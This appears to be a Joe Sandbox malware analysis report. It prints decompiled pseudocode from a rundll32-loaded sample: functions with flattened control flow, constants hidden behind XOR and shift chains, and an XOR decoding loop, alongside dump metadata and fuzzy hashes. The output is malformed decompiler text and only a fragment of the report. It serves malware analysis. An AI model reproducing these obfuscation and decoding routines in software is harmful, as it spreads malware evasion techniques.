                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x3e8;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0x0028604d;
                                                                                                                      				_t68 =  *_t50;
                                                                                                                      				_t82 =  &(_t81[1]);
                                                                                                                      				_t52 =  *_t81 ^ _t68;
                                                                                                                      				 *(_t94 + 0x24) = _t68;
                                                                                                                      				 *(_t94 + 0x28) = _t52;
                                                                                                                      				_t33 = _t52 + 1; // 0x1
                                                                                                                      				_t84 =  !=  ? (_t33 & 0xfffffffc) + 4 : _t33;
                                                                                                                      				_t95 = _t94 + 8;
                                                                                                                      				_t65 = E00183512(_t84);
                                                                                                                      				 *(_t95 + 0x2c) = _t65;
                                                                                                                      				if(_t65 != 0) {
                                                                                                                      					_t92 = 0;
                                                                                                                      					_t80 = _t65;
                                                                                                                      					_t90 =  >  ? 0 :  &(_t82[_t84 >> 2]) - _t82 + 3 >> 2;
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						_t66 =  *(_t95 + 0x18);
                                                                                                                      						do {
                                                                                                                      							_t75 =  *_t82;
                                                                                                                      							_t82 =  &(_t82[1]);
                                                                                                                      							_t76 = _t75 ^ _t66;
                                                                                                                      							 *_t80 = _t76;
                                                                                                                      							_t80 =  &(_t80[1]);
                                                                                                                      							_t77 = _t76 >> 0x10;
                                                                                                                      							 *((char*)(_t80 - 3)) = _t76 >> 8;
                                                                                                                      							 *(_t80 - 2) = _t77;
                                                                                                                      							_t92 = _t92 + 1;
                                                                                                                      							 *((char*)(_t80 - 1)) = _t77 >> 8;
                                                                                                                      						} while (_t92 < _t90);
                                                                                                                      						_t65 =  *(_t95 + 0x28);
                                                                                                                      					}
                                                                                                                      					 *((char*)(_t65 +  *((intOrPtr*)(_t95 + 0x1c)))) = 0;
                                                                                                                      				}
                                                                                                                      				return _t65;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (q$M`(
                                                                                                                      • API String ID: 0-2580875808
                                                                                                                      • Opcode ID: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction ID: 91cb4f2b9c03a3bc5842fba08ce91121ddb62c1d7c2805d1d814b53d9c8592d0
                                                                                                                      • Opcode Fuzzy Hash: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction Fuzzy Hash: 62319A72A093018FD344CF18C88441BFBE0FFA8718F058A5CF88997241DB74EA09CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0017F154(void* __eflags) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				char _v44;
                                                                                                                      				short _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				char _v576;
                                                                                                                      				void* _t83;
                                                                                                                      				intOrPtr* _t85;
                                                                                                                      				signed int _t89;
                                                                                                                      
                                                                                                                      				_v56 = 0xd50633;
                                                                                                                      				_v52 = 0xe1ee45;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v24 = 0xad73ca;
                                                                                                                      				_v24 = _v24 ^ 0x73620612;
                                                                                                                      				_v24 = _v24 ^ 0x73c7a99a;
                                                                                                                      				_v32 = 0x597259;
                                                                                                                      				_t89 = 0x52;
                                                                                                                      				_push(_t89);
                                                                                                                      				_v32 = _v32 / _t89;
                                                                                                                      				_v32 = _v32 ^ 0x0009f267;
                                                                                                                      				_v20 = 0xd3cfac;
                                                                                                                      				_v20 = _v20 << 9;
                                                                                                                      				_v20 = _v20 | 0x4896bc35;
                                                                                                                      				_v20 = _v20 ^ 0xef9372aa;
                                                                                                                      				_v28 = 0xdbc61e;
                                                                                                                      				_v28 = _v28 << 1;
                                                                                                                      				_v28 = _v28 ^ 0x01b432fd;
                                                                                                                      				_v16 = 0x90d5a3;
                                                                                                                      				_v16 = _v16 + 0xffffb729;
                                                                                                                      				_v16 = _v16 + 0xffff3d25;
                                                                                                                      				_v16 = _v16 ^ 0x0089c5ce;
                                                                                                                      				_v8 = 0xd44b29;
                                                                                                                      				_v8 = _v8 + 0x631b;
                                                                                                                      				_v8 = _v8 | 0x8b07e3a3;
                                                                                                                      				_v8 = _v8 * 0x62;
                                                                                                                      				_v8 = _v8 ^ 0x88a24378;
                                                                                                                      				_v12 = 0x36955e;
                                                                                                                      				_v12 = _v12 + 0xb114;
                                                                                                                      				_v12 = _v12 + 0xffffe207;
                                                                                                                      				_v12 = _v12 ^ 0x0030a900;
                                                                                                                      				_v36 = 0x9daa5e;
                                                                                                                      				_v36 = _v36 + 0xffffbce6;
                                                                                                                      				_v36 = _v36 ^ 0x0093fbb5;
                                                                                                                      				_v40 = 0x60d009;
                                                                                                                      				_v40 = _v40 >> 1;
                                                                                                                      				_v40 = _v40 ^ 0x003d09ba;
                                                                                                                      				_t96 = _v24;
                                                                                                                      				_t83 = E00175C03( &_v576, _v24, _v32);
                                                                                                                      				_pop(0);
                                                                                                                      				if(_t83 != 0) {
                                                                                                                      					_t85 =  &_v576;
                                                                                                                      					if(_v576 != 0) {
                                                                                                                      						while( *_t85 != 0x5c) {
                                                                                                                      							_t85 = _t85 + 2;
                                                                                                                      							if( *_t85 != 0) {
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      							}
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						 *((short*)(_t85 + 2)) = 0;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_push(0);
                                                                                                                      					_push(0);
                                                                                                                      					E0017884A(_v20, _t96, _v28, _v16, 0, _v8, 0, _v12,  &_v576, _v36, 0,  &_v44, _v40);
                                                                                                                      				}
                                                                                                                      				return _v44;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E$YrY
                                                                                                                      • API String ID: 0-1711274510
                                                                                                                      • Opcode ID: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction ID: e2efd807b8aa890297b0b9d7b42d9c8bd55d646c4530cac611248ca08f31c5dd
                                                                                                                      • Opcode Fuzzy Hash: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction Fuzzy Hash: 5341E272C0121EEBCF59CFE4C94A9EEBBB5FB04304F208199E415B62A0E7B54A45DF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E001864F1(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t137;
                                                                                                                      				void* _t150;
                                                                                                                      				intOrPtr _t151;
                                                                                                                      				void* _t157;
                                                                                                                      				intOrPtr* _t172;
                                                                                                                      				intOrPtr _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int* _t179;
                                                                                                                      
                                                                                                                      				_t155 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_t172 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t137);
                                                                                                                      				_v48 = 0x93d665;
                                                                                                                      				_t179 =  &(( &_v100)[4]);
                                                                                                                      				_t173 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_t157 = 0x9466795;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_v92 = 0xc35ba1;
                                                                                                                      				_v92 = _v92 + 0xcdf2;
                                                                                                                      				_t174 = 0x24;
                                                                                                                      				_v92 = _v92 / _t174;
                                                                                                                      				_v92 = _v92 ^ 0x5a7ecd09;
                                                                                                                      				_v92 = _v92 ^ 0x5a7bbfe7;
                                                                                                                      				_v56 = 0x6ac612;
                                                                                                                      				_v56 = _v56 ^ 0x41bcc0f7;
                                                                                                                      				_v56 = _v56 + 0xffffadf0;
                                                                                                                      				_v56 = _v56 ^ 0x41d5b4d5;
                                                                                                                      				_v100 = 0xa175c9;
                                                                                                                      				_v100 = _v100 | 0xb7da1d5b;
                                                                                                                      				_v100 = _v100 ^ 0x832b9b3a;
                                                                                                                      				_v100 = _v100 ^ 0xfbd8173c;
                                                                                                                      				_v100 = _v100 ^ 0xcf0e566f;
                                                                                                                      				_v68 = 0xb337e;
                                                                                                                      				_v68 = _v68 >> 0xf;
                                                                                                                      				_v68 = _v68 + 0xffffb10e;
                                                                                                                      				_v68 = _v68 ^ 0xfff97d65;
                                                                                                                      				_v72 = 0x51a563;
                                                                                                                      				_v72 = _v72 | 0x5dd657cd;
                                                                                                                      				_v72 = _v72 >> 0xb;
                                                                                                                      				_v72 = _v72 ^ 0x0003baa1;
                                                                                                                      				_v76 = 0xe50ce8;
                                                                                                                      				_t175 = 0x4f;
                                                                                                                      				_v76 = _v76 / _t175;
                                                                                                                      				_v76 = _v76 | 0x5f70b90d;
                                                                                                                      				_v76 = _v76 ^ 0x5f701ab2;
                                                                                                                      				_v80 = 0xbdb868;
                                                                                                                      				_v80 = _v80 * 0x3f;
                                                                                                                      				_v80 = _v80 + 0x8645;
                                                                                                                      				_v80 = _v80 | 0x0d4f9aa3;
                                                                                                                      				_v80 = _v80 ^ 0x2ff450e8;
                                                                                                                      				_v52 = 0x17e057;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 ^ 0x00020d27;
                                                                                                                      				_v60 = 0xa13b54;
                                                                                                                      				_v60 = _v60 * 0x33;
                                                                                                                      				_v60 = _v60 ^ 0x49292d47;
                                                                                                                      				_v60 = _v60 ^ 0x693c6a3c;
                                                                                                                      				_v84 = 0xcd99b1;
                                                                                                                      				_v84 = _v84 + 0x2d8d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xffff7b1e;
                                                                                                                      				_v84 = _v84 ^ 0x66e29e95;
                                                                                                                      				_v88 = 0xe50b02;
                                                                                                                      				_v88 = _v88 ^ 0x6ddcea1b;
                                                                                                                      				_v88 = _v88 >> 0x10;
                                                                                                                      				_v88 = _v88 * 0x49;
                                                                                                                      				_v88 = _v88 ^ 0x001db712;
                                                                                                                      				_v64 = 0xb5c75b;
                                                                                                                      				_v64 = _v64 * 0x46;
                                                                                                                      				_t176 = 0x77;
                                                                                                                      				_v64 = _v64 / _t176;
                                                                                                                      				_v64 = _v64 ^ 0x006c56aa;
                                                                                                                      				_v96 = 0xaabe6e;
                                                                                                                      				_v96 = _v96 << 5;
                                                                                                                      				_v96 = _v96 + 0xffff8361;
                                                                                                                      				_v96 = _v96 << 3;
                                                                                                                      				_v96 = _v96 ^ 0xaab2b903;
                                                                                                                      				do {
                                                                                                                      					while(_t157 != 0x179a40a) {
                                                                                                                      						if(_t157 == 0x8ebb7f5) {
                                                                                                                      							_t151 =  *0x195c9c; // 0x0
                                                                                                                      							E0018D6C0(_v80, _v52, _v60, _t157, _v84, _v88,  &_v36, _t157, _v64, _v92, _v96,  *_t155,  *((intOrPtr*)(_t155 + 4)),  *((intOrPtr*)(_t151 + 8)));
                                                                                                                      							_t173 =  ==  ? 1 : _t173;
                                                                                                                      						} else {
                                                                                                                      							if(_t157 != 0x9466795) {
                                                                                                                      								goto L8;
                                                                                                                      							} else {
                                                                                                                      								_t157 = 0x179a40a;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L11:
                                                                                                                      						return _t173;
                                                                                                                      					}
                                                                                                                      					_push( *_t172);
                                                                                                                      					_t150 = E00181831(_v68, _v72,  &_v36, _v76, _t157,  *((intOrPtr*)(_t172 + 4)));
                                                                                                                      					_t179 =  &(_t179[6]);
                                                                                                                      					if(_t150 == 0) {
                                                                                                                      						_t157 = 0x49089dc;
                                                                                                                      						goto L8;
                                                                                                                      					} else {
                                                                                                                      						_t157 = 0x8ebb7f5;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L11;
                                                                                                                      					L8:
                                                                                                                      				} while (_t157 != 0x49089dc);
                                                                                                                      				goto L11;
                                                                                                                      			}






























                                                                                                                      0x001866cb
                                                                                                                      0x001866d3
                                                                                                                      0x001866db
                                                                                                                      0x001866e0
                                                                                                                      0x001866e8
                                                                                                                      0x001866ed
                                                                                                                      0x001866f5
                                                                                                                      0x001866f5
                                                                                                                      0x001866ff
                                                                                                                      0x0018674a
                                                                                                                      0x0018677e
                                                                                                                      0x0018678f
                                                                                                                      0x00186701
                                                                                                                      0x00186707
                                                                                                                      0x00000000
                                                                                                                      0x00186709
                                                                                                                      0x00186709
                                                                                                                      0x00000000
                                                                                                                      0x00186709
                                                                                                                      0x00186707
                                                                                                                      0x00186793
                                                                                                                      0x0018679b
                                                                                                                      0x0018679b
                                                                                                                      0x0018670d
                                                                                                                      0x00186728
                                                                                                                      0x0018672d
                                                                                                                      0x00186732
                                                                                                                      0x0018673b
                                                                                                                      0x00000000
                                                                                                                      0x00186734
                                                                                                                      0x00186734
                                                                                                                      0x00000000
                                                                                                                      0x00186734
                                                                                                                      0x00000000
                                                                                                                      0x00186740
                                                                                                                      0x00186740
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <j<i
                                                                                                                      • API String ID: 0-2573498096
                                                                                                                      • Opcode ID: 6d1e5c71e07a043400845355e6747196415eb228be0975844849aa1dbaf11c06
                                                                                                                      • Instruction ID: 792129efa7cbc2158001e8668a26a7656eaf7caf1430869aa3f3eb03dd293adc
                                                                                                                      • Opcode Fuzzy Hash: 6d1e5c71e07a043400845355e6747196415eb228be0975844849aa1dbaf11c06
                                                                                                                      • Instruction Fuzzy Hash: 4F6110B15093419FC754DF25C98A81BFBE2FBC4B58F409A1EF58696220E3718A49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00184B56() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _t95;
                                                                                                                      				signed int _t101;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				signed int _t122;
                                                                                                                      				signed int _t123;
                                                                                                                      				signed int _t124;
                                                                                                                      				void* _t126;
                                                                                                                      				signed int _t127;
                                                                                                                      				signed int* _t128;
                                                                                                                      
                                                                                                                      				_t128 =  &_v564;
                                                                                                                      				_v556 = 0x172e57;
                                                                                                                      				_v556 = _v556 ^ 0x73ef0dea;
                                                                                                                      				_t104 = 0x4d22871;
                                                                                                                      				_v556 = _v556 << 5;
                                                                                                                      				_v556 = _v556 ^ 0x7f0420db;
                                                                                                                      				_v564 = 0x28c43f;
                                                                                                                      				_t122 = 0x37;
                                                                                                                      				_v564 = _v564 / _t122;
                                                                                                                      				_v564 = _v564 ^ 0x0004b302;
                                                                                                                      				_t126 = 0;
                                                                                                                      				_v540 = 0xa3dd1;
                                                                                                                      				_v540 = _v540 >> 7;
                                                                                                                      				_v540 = _v540 ^ 0x000ead4a;
                                                                                                                      				_v548 = 0xb6c83;
                                                                                                                      				_v548 = _v548 >> 2;
                                                                                                                      				_v548 = _v548 ^ 0x000dd0d2;
                                                                                                                      				_v544 = 0xa789eb;
                                                                                                                      				_t123 = 0x5a;
                                                                                                                      				_v544 = _v544 / _t123;
                                                                                                                      				_v544 = _v544 ^ 0x000aafac;
                                                                                                                      				_v532 = 0x6a9d21;
                                                                                                                      				_t124 = 0x13;
                                                                                                                      				_t125 = _v564;
                                                                                                                      				_v532 = _v532 / _t124;
                                                                                                                      				_v532 = _v532 ^ 0x0003d3c1;
                                                                                                                      				_v528 = 0x3996e5;
                                                                                                                      				_v528 = _v528 >> 4;
                                                                                                                      				_v528 = _v528 ^ 0x0009e8d5;
                                                                                                                      				_t103 = _v564;
                                                                                                                      				_t127 = _v564;
                                                                                                                      				_v536 = 0xc5251e;
                                                                                                                      				_v536 = _v536 ^ 0x87fb489f;
                                                                                                                      				_v536 = _v536 ^ 0x87377a50;
                                                                                                                      				_v560 = 0x43b612;
                                                                                                                      				_v560 = _v560 >> 0xe;
                                                                                                                      				_v560 = _v560 ^ 0x7320a641;
                                                                                                                      				_v560 = _v560 ^ 0xd4a0e575;
                                                                                                                      				_v560 = _v560 ^ 0xa78970ff;
                                                                                                                      				_v552 = 0x3a31ae;
                                                                                                                      				_v552 = _v552 ^ 0x0baee347;
                                                                                                                      				_v552 = _v552 ^ 0x0b916be4;
                                                                                                                      				do {
                                                                                                                      					while(_t104 != 0x42ef3b0) {
                                                                                                                      						if(_t104 == 0x4d22871) {
                                                                                                                      							_t104 = 0xc70fe83;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t104 == 0x81a395a) {
                                                                                                                      								_v564 = 0x2f01d9;
                                                                                                                      								_v564 = _v564 + 0xd8f0;
                                                                                                                      								_v564 = _v564 ^ 0x2a08da2b;
                                                                                                                      								__eflags = _t103 - _v564;
                                                                                                                      								_t126 =  ==  ? 1 : _t126;
                                                                                                                      							} else {
                                                                                                                      								if(_t104 == 0x918a316) {
                                                                                                                      									_t103 = E00177677(_t127, _v536, _v560, _v552);
                                                                                                                      									_t104 = 0x81a395a;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t104 == 0xc70fe83) {
                                                                                                                      										_t101 = E0017C706();
                                                                                                                      										_t125 = _t101;
                                                                                                                      										__eflags = _t101;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t104 = 0x42ef3b0;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t104 != 0xea0747d) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t127 = E00184FA8(_v544,  &_v524, _v532, _v528);
                                                                                                                      											_t104 = 0x918a316;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t126;
                                                                                                                      					}
                                                                                                                      					_t95 = E00191993(_v564, _v540, __eflags,  &_v524, _t104, _v548, _t125);
                                                                                                                      					_t128 =  &(_t128[4]);
                                                                                                                      					__eflags = _t95;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t104 = 0xffaf3fd;
                                                                                                                      						goto L15;
                                                                                                                      					} else {
                                                                                                                      						_t104 = 0xea0747d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t104 - 0xffaf3fd;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}
                                                                                                                      0x00184d81
                                                                                                                      0x00184ca3
                                                                                                                      0x00184ca9
                                                                                                                      0x00184d0e
                                                                                                                      0x00184d10
                                                                                                                      0x00000000
                                                                                                                      0x00184cab
                                                                                                                      0x00184cb1
                                                                                                                      0x00184ce3
                                                                                                                      0x00184ce8
                                                                                                                      0x00184cea
                                                                                                                      0x00184cec
                                                                                                                      0x00184cf2
                                                                                                                      0x00000000
                                                                                                                      0x00184cf2
                                                                                                                      0x00184cb3
                                                                                                                      0x00184cb9
                                                                                                                      0x00000000
                                                                                                                      0x00184cbf
                                                                                                                      0x00184cd6
                                                                                                                      0x00184cd8
                                                                                                                      0x00000000
                                                                                                                      0x00184cd8
                                                                                                                      0x00184cb9
                                                                                                                      0x00184cb1
                                                                                                                      0x00184ca9
                                                                                                                      0x00184c9d
                                                                                                                      0x00184d85
                                                                                                                      0x00184d90
                                                                                                                      0x00184d90
                                                                                                                      0x00184d37
                                                                                                                      0x00184d3c
                                                                                                                      0x00184d3f
                                                                                                                      0x00184d41
                                                                                                                      0x00184d4d
                                                                                                                      0x00000000
                                                                                                                      0x00184d43
                                                                                                                      0x00184d43
                                                                                                                      0x00000000
                                                                                                                      0x00184d43
                                                                                                                      0x00000000
                                                                                                                      0x00184d52
                                                                                                                      0x00184d52
                                                                                                                      0x00184d52
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 0-1867647943
                                                                                                                      • Opcode ID: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction ID: 5a7bff777f255291dc6010ff0e8b1610169da60d18a095e78a653c894836bea5
                                                                                                                      • Opcode Fuzzy Hash: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction Fuzzy Hash: 2951DB712093429FC358EF65D18942BBBE1EFD4708F20892EF59A96260CB70DA09CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0017E86A() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _t97;
                                                                                                                      				signed int _t99;
                                                                                                                      				intOrPtr _t100;
                                                                                                                      				void* _t105;
                                                                                                                      				signed int _t114;
                                                                                                                      				short* _t117;
                                                                                                                      				signed int* _t119;
                                                                                                                      
                                                                                                                      				_t119 =  &_v564;
                                                                                                                      				_v560 = 0xce5cf0;
                                                                                                                      				_v560 = _v560 | 0x815fac8b;
                                                                                                                      				_t105 = 0x687a68b;
                                                                                                                      				_t114 = 0x3d;
                                                                                                                      				_v560 = _v560 / _t114;
                                                                                                                      				_v560 = _v560 ^ 0x02257571;
                                                                                                                      				_v552 = 0x865242;
                                                                                                                      				_v552 = _v552 * 0x34;
                                                                                                                      				_v552 = _v552 >> 6;
                                                                                                                      				_v552 = _v552 ^ 0x0066bbb6;
                                                                                                                      				_v524 = 0xc32fa5;
                                                                                                                      				_v524 = _v524 * 0x41;
                                                                                                                      				_v524 = _v524 ^ 0x3182565b;
                                                                                                                      				_v548 = 0xb61c38;
                                                                                                                      				_v548 = _v548 * 0x62;
                                                                                                                      				_v548 = _v548 | 0xd3f7f889;
                                                                                                                      				_v548 = _v548 ^ 0xd7f1c5f5;
                                                                                                                      				_v536 = 0xb1408a;
                                                                                                                      				_v536 = _v536 >> 3;
                                                                                                                      				_v536 = _v536 ^ 0x001ed817;
                                                                                                                      				_v556 = 0x4c3333;
                                                                                                                      				_v556 = _v556 + 0xffff679f;
                                                                                                                      				_v556 = _v556 >> 0xf;
                                                                                                                      				_v556 = _v556 ^ 0x000b6621;
                                                                                                                      				_v528 = 0x174ea7;
                                                                                                                      				_v528 = _v528 >> 8;
                                                                                                                      				_v528 = _v528 ^ 0x00085e65;
